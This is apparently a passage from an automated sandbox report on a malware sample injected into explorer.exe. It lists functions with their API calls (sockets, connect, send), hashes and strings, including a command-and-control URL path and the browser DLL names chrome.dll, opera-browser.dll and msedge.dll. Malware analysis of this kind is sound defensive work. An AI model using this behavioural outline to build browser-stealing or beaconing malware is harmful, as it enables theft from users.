                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: socket.WS2_32 ref: 0E8F6882
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: gethostbyname.WS2_32 ref: 0E8F6899
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: memcpy.MSVCRT ref: 0E8F68B9
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: htons.WS2_32 ref: 0E8F68C8
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: connect.WS2_32 ref: 0E8F68DF
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrlenA.KERNEL32 ref: 0E8F68F5
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: send.WS2_32 ref: 0E8F690B
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0E8F89FC
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0E8F8A0A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$CriticalSectionlstrcpylstrlen$lstrcmpimemcpysendwsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                                                    • String ID: /VzCAHn.php?7D3ED97FB83B796922796$7D3ED97FB83B796922796
                                                                                                                                                                                                                                                    • API String ID: 3667244998-2144912861
                                                                                                                                                                                                                                                    • Opcode ID: b6b2d1ff795d1c1591e8ef6c224f6a391a5d563f9db5d2ddf1fa553536da28b9
                                                                                                                                                                                                                                                    • Instruction ID: 1dc7eb74281d5cbed04656affa39df15b2d7f08d81c30a0afdab46ebf1c3efa5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6b2d1ff795d1c1591e8ef6c224f6a391a5d563f9db5d2ddf1fa553536da28b9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31512835215B85E2EF10DB25F85435A73B5FB88B90F400916DA8EA3BB8EF38C655CB41
                                                                                                                                                                                                                                                    Function 10D7FA20 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4099253644-0
                                                                                                                                                                                                                                                    • Opcode ID: 9e9b8849ca7b916cfaa307229c1ea737264588bd9ab4c7e34c75c1d806da7780
                                                                                                                                                                                                                                                    • Instruction ID: c7829a77ebe6e24b1f150ee37ef9bb87d948401fdbd840220317c1f77447d24d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e9b8849ca7b916cfaa307229c1ea737264588bd9ab4c7e34c75c1d806da7780
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D312D75701A05C6EE558BE9F8623B83360FB49B98F489615DD9D072B1DFBCC8D48318
                                                                                                                                                                                                                                                    Function 0F4BFA20 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4099253644-0
                                                                                                                                                                                                                                                    • Opcode ID: 9e9b8849ca7b916cfaa307229c1ea737264588bd9ab4c7e34c75c1d806da7780
                                                                                                                                                                                                                                                    • Instruction ID: e5d4c4d91b081a06446cc83ff08e78e7333d8ed3d3ac93a0bb7f5d836628caa1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e9b8849ca7b916cfaa307229c1ea737264588bd9ab4c7e34c75c1d806da7780
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB317325615B0682FF699B9AE8D03B63360BF58B64F48463ECE5D4AB63DF3CD0549320
                                                                                                                                                                                                                                                    Function 0E90FA20 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4099253644-0
                                                                                                                                                                                                                                                    • Opcode ID: 9e9b8849ca7b916cfaa307229c1ea737264588bd9ab4c7e34c75c1d806da7780
                                                                                                                                                                                                                                                    • Instruction ID: b64db018149643bab5c1957f80e95483f2e4fdd3778894a20bbcbac331e2f7fb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e9b8849ca7b916cfaa307229c1ea737264588bd9ab4c7e34c75c1d806da7780
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B31FF35312A859AEE399B69E8A437863A4AFC8B90F880F15DD1D576E4DF3CC6448B04
                                                                                                                                                                                                                                                    Function 0C370F60 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$_malloc_crtmalloc
                                                                                                                                                                                                                                                    • String ID: anadian$english-us
                                                                                                                                                                                                                                                    • API String ID: 2027218043-4118637525
                                                                                                                                                                                                                                                    • Opcode ID: 201d27d793f1c669e1495544b9ad875c2bd810579d1f4cb74c19f5984264e29a
                                                                                                                                                                                                                                                    • Instruction ID: 4a9eb0f993665d66400d7f72ec81ebe25c667164f442e749ee41c31e2ec6ea9c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 201d27d793f1c669e1495544b9ad875c2bd810579d1f4cb74c19f5984264e29a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3751AF32321B4593EB24EF26E99079A73A4F788B98F4482259F5D47F14DF3CC16A9B40
                                                                                                                                                                                                                                                    Function 0A040F60 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$_malloc_crtmalloc
                                                                                                                                                                                                                                                    • String ID: anadian$english-us
                                                                                                                                                                                                                                                    • API String ID: 2027218043-4118637525
                                                                                                                                                                                                                                                    • Opcode ID: 201d27d793f1c669e1495544b9ad875c2bd810579d1f4cb74c19f5984264e29a
                                                                                                                                                                                                                                                    • Instruction ID: 2d01551af3b9bcc271367e9146e78ab1cfd2256047c1c79f4df8f5cb9fc2ff1b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 201d27d793f1c669e1495544b9ad875c2bd810579d1f4cb74c19f5984264e29a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD51A072701B4893EB20EF26E94039A77A4F788B98F454235DF5D47B21EF38C0A68B44
                                                                                                                                                                                                                                                    Function 0E8C0F60 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$_malloc_crtmalloc
                                                                                                                                                                                                                                                    • String ID: anadian$english-us
                                                                                                                                                                                                                                                    • API String ID: 2027218043-4118637525
                                                                                                                                                                                                                                                    • Opcode ID: 201d27d793f1c669e1495544b9ad875c2bd810579d1f4cb74c19f5984264e29a
                                                                                                                                                                                                                                                    • Instruction ID: cc1e9f374bd1951f92e2d4a076420c805f90a82192388907af2db57dcfcaffa9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 201d27d793f1c669e1495544b9ad875c2bd810579d1f4cb74c19f5984264e29a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B51C332302B4493EB11DF66E99035A73B4F789BA8F4445299F9C87B50EF38C866C740
                                                                                                                                                                                                                                                    Function 10D6E640 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: isprint$strstr
                                                                                                                                                                                                                                                    • String ID: DELETE$GET$PATCH$POST$PUT
                                                                                                                                                                                                                                                    • API String ID: 1066184663-1590512397
                                                                                                                                                                                                                                                    • Opcode ID: ce1d374ef6b9b1942780a81c10b6dbdcb3e962423b1347e4a7050d8422866340
                                                                                                                                                                                                                                                    • Instruction ID: 54dd051ab3ccf3a439a301557d32cb7bb2083d581c2d6d406e97856a2f2eb9b4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce1d374ef6b9b1942780a81c10b6dbdcb3e962423b1347e4a7050d8422866340
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5741F237204BD487DB618F61F5803AAB7A5F385B98F85462ADECA43764EB78C085C700
                                                                                                                                                                                                                                                    Function 0F4AE640 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: isprint$strstr
                                                                                                                                                                                                                                                    • String ID: DELETE$GET$PATCH$POST$PUT
                                                                                                                                                                                                                                                    • API String ID: 1066184663-1590512397
                                                                                                                                                                                                                                                    • Opcode ID: ce1d374ef6b9b1942780a81c10b6dbdcb3e962423b1347e4a7050d8422866340
                                                                                                                                                                                                                                                    • Instruction ID: 03442e4a04cf6d9c3592ec560178fa0c913ea25d509764148817af075c37d38c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce1d374ef6b9b1942780a81c10b6dbdcb3e962423b1347e4a7050d8422866340
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F41E227204B9485DB208F22F1903BBB7E5F385B54FC4562ADEAA43766EB7DC045C700
                                                                                                                                                                                                                                                    Function 0E8FE640 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: isprint$strstr
                                                                                                                                                                                                                                                    • String ID: DELETE$GET$PATCH$POST$PUT
                                                                                                                                                                                                                                                    • API String ID: 1066184663-1590512397
                                                                                                                                                                                                                                                    • Opcode ID: ce1d374ef6b9b1942780a81c10b6dbdcb3e962423b1347e4a7050d8422866340
                                                                                                                                                                                                                                                    • Instruction ID: 26c9b744f171e2d963e9a86dbccba52fc2a47a1cc6e14cbecc245614dd25fc4c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce1d374ef6b9b1942780a81c10b6dbdcb3e962423b1347e4a7050d8422866340
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA41F333614B94C5DB208F21F5803AAB7E5F789764F844626DF8A837A8EB7CC455CB00
                                                                                                                                                                                                                                                    Function 10D75A60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 121COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CloseCriticalFileInitializeNameSectionfreemalloc
                                                                                                                                                                                                                                                    • String ID: .text$chrome.dll
                                                                                                                                                                                                                                                    • API String ID: 3938434885-2273382785
                                                                                                                                                                                                                                                    • Opcode ID: dc7eb8652c682715ca0630bcf9166c642b2611dcf9911994a66b0355e7cacb11
                                                                                                                                                                                                                                                    • Instruction ID: b1bcc372c4427d476c7bf4496f2b6bcb1b32d1cc1f9dbe3b67788d337ff5f131
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc7eb8652c682715ca0630bcf9166c642b2611dcf9911994a66b0355e7cacb11
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17516D35304B8186EA50DF61F8903D977A0FB89BC8FC88125DA8E83358EFB8D645C750
                                                                                                                                                                                                                                                    Function 10D75F80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 121COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CloseCriticalFileInitializeNameSectionfreemalloc
                                                                                                                                                                                                                                                    • String ID: .text$opera-browser.dll
                                                                                                                                                                                                                                                    • API String ID: 3938434885-1329048407
                                                                                                                                                                                                                                                    • Opcode ID: 4b92112a645bfab9ba77e7c679c819b68c6c5d09ba546e590848a21bb860d6da
                                                                                                                                                                                                                                                    • Instruction ID: b98d4379380caea986f572244e768608070b2050ae9cc9283029c0d4be7b324b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b92112a645bfab9ba77e7c679c819b68c6c5d09ba546e590848a21bb860d6da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7517E35304B8296EA50DF62F8543DA77A4FB89BC8F888126DE8D83758EF78C546C750
                                                                                                                                                                                                                                                    Function 0F4B5F80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 121COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CloseCriticalFileInitializeNameSectionfreemalloc
                                                                                                                                                                                                                                                    • String ID: .text$opera-browser.dll
                                                                                                                                                                                                                                                    • API String ID: 3938434885-1329048407
                                                                                                                                                                                                                                                    • Opcode ID: 4b92112a645bfab9ba77e7c679c819b68c6c5d09ba546e590848a21bb860d6da
                                                                                                                                                                                                                                                    • Instruction ID: e56cdbf2719100a224f932a577079001af341fb31ee160cfefb3bd6fa401d988
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b92112a645bfab9ba77e7c679c819b68c6c5d09ba546e590848a21bb860d6da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17513E21705B4291EA31DB16E8503EB73A4FB89B84F89413ADE4E47B5AEF3CC10AD750
                                                                                                                                                                                                                                                    Function 0F4B5A60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 121COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CloseCriticalFileInitializeNameSectionfreemalloc
                                                                                                                                                                                                                                                    • String ID: .text$chrome.dll
                                                                                                                                                                                                                                                    • API String ID: 3938434885-2273382785
                                                                                                                                                                                                                                                    • Opcode ID: dc7eb8652c682715ca0630bcf9166c642b2611dcf9911994a66b0355e7cacb11
                                                                                                                                                                                                                                                    • Instruction ID: eb1719f1f709fb398a2b27aea2b5f91c41967de5fecf2d2ca0ad534f2f5b6ccf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc7eb8652c682715ca0630bcf9166c642b2611dcf9911994a66b0355e7cacb11
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D513321704B4295EA31DB16E8543EAB365FB88B84F8C412ADE4E47B5AEF3CC505D750
                                                                                                                                                                                                                                                    Function 0E905F80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 121COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CloseCriticalFileInitializeNameSectionfreemalloc
                                                                                                                                                                                                                                                    • String ID: .text$opera-browser.dll
                                                                                                                                                                                                                                                    • API String ID: 3938434885-1329048407
                                                                                                                                                                                                                                                    • Opcode ID: 7b69f4e120ede19dd6d3ccf6d186e0b12d13df052254310748f1e70026abba8a
                                                                                                                                                                                                                                                    • Instruction ID: 3587b750575f01095607fee5ece422b79f5ab6325e6a0ef22887b52df6aa5be1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b69f4e120ede19dd6d3ccf6d186e0b12d13df052254310748f1e70026abba8a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D516121305B85DADF20DB16E85439A77A4FB88B84FC84926CB4D93799EF38C655CB40
                                                                                                                                                                                                                                                    Function 0E905A60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 121COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CloseCriticalFileInitializeNameSectionfreemalloc
                                                                                                                                                                                                                                                    • String ID: .text$chrome.dll
                                                                                                                                                                                                                                                    • API String ID: 3938434885-2273382785
                                                                                                                                                                                                                                                    • Opcode ID: cb560c75c7a292089259297d823e46c26b1af7031aff94a96a349452ed4b0a65
                                                                                                                                                                                                                                                    • Instruction ID: e49d7bbcb52e82a7b06d2d403fe11f8869888c7ff9efaf122a571c5fe89afaf8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb560c75c7a292089259297d823e46c26b1af7031aff94a96a349452ed4b0a65
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88515021315B85D9EF20DF16E85439A63A4FBC8B84FC94925CE4E97794EF38CA45CB40
                                                                                                                                                                                                                                                    Function 10D75CF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CloseCriticalFileInitializeNameSectionfreemalloc
                                                                                                                                                                                                                                                    • String ID: .text$msedge.dll
                                                                                                                                                                                                                                                    • API String ID: 3938434885-1648341552
                                                                                                                                                                                                                                                    • Opcode ID: a97654cb76b4ab5693e4ea419277ad5a2f3a863d864b77a08fe26fa75674a5fc
                                                                                                                                                                                                                                                    • Instruction ID: c523aac43ecf03715c36e25c390de1d5af3d59ef7bd4195b0e01250f901af788
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a97654cb76b4ab5693e4ea419277ad5a2f3a863d864b77a08fe26fa75674a5fc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5415C76314A8186EA60DF61F8543DA77A4F788BC8FC88125DA8D83758EFB8C546C750
                                                                                                                                                                                                                                                    Function 0F4B5CF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CloseCriticalFileInitializeNameSectionfreemalloc
                                                                                                                                                                                                                                                    • String ID: .text$msedge.dll
                                                                                                                                                                                                                                                    • API String ID: 3938434885-1648341552
                                                                                                                                                                                                                                                    • Opcode ID: a97654cb76b4ab5693e4ea419277ad5a2f3a863d864b77a08fe26fa75674a5fc
                                                                                                                                                                                                                                                    • Instruction ID: 21ed4fdd2210ecbdddefb9c9a51858f190f1bfa387866eead1d0157aec94c7c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a97654cb76b4ab5693e4ea419277ad5a2f3a863d864b77a08fe26fa75674a5fc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E411031314B8285EA31DF15E8543EA77A5F788B84F88452ADE4E47B5ADF3CC10AD750
                                                                                                                                                                                                                                                    Function 0E905CF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CloseCriticalFileInitializeNameSectionfreemalloc
                                                                                                                                                                                                                                                    • String ID: .text$msedge.dll
                                                                                                                                                                                                                                                    • API String ID: 3938434885-1648341552
                                                                                                                                                                                                                                                    • Opcode ID: 4ad2ef9df133e4535c58f8c08302560c15cd8a264fbc2fe6a141e0d00aab7858
                                                                                                                                                                                                                                                    • Instruction ID: d38e433a2796ffbf1bbec0e3b5325336f656979a05c99bc87cab0b2fccc48e90
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ad2ef9df133e4535c58f8c08302560c15cd8a264fbc2fe6a141e0d00aab7858
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71415E32315B8595EF20DF15E85439A77A4F788B84FC9492ACB8E93768EF38C545CB40
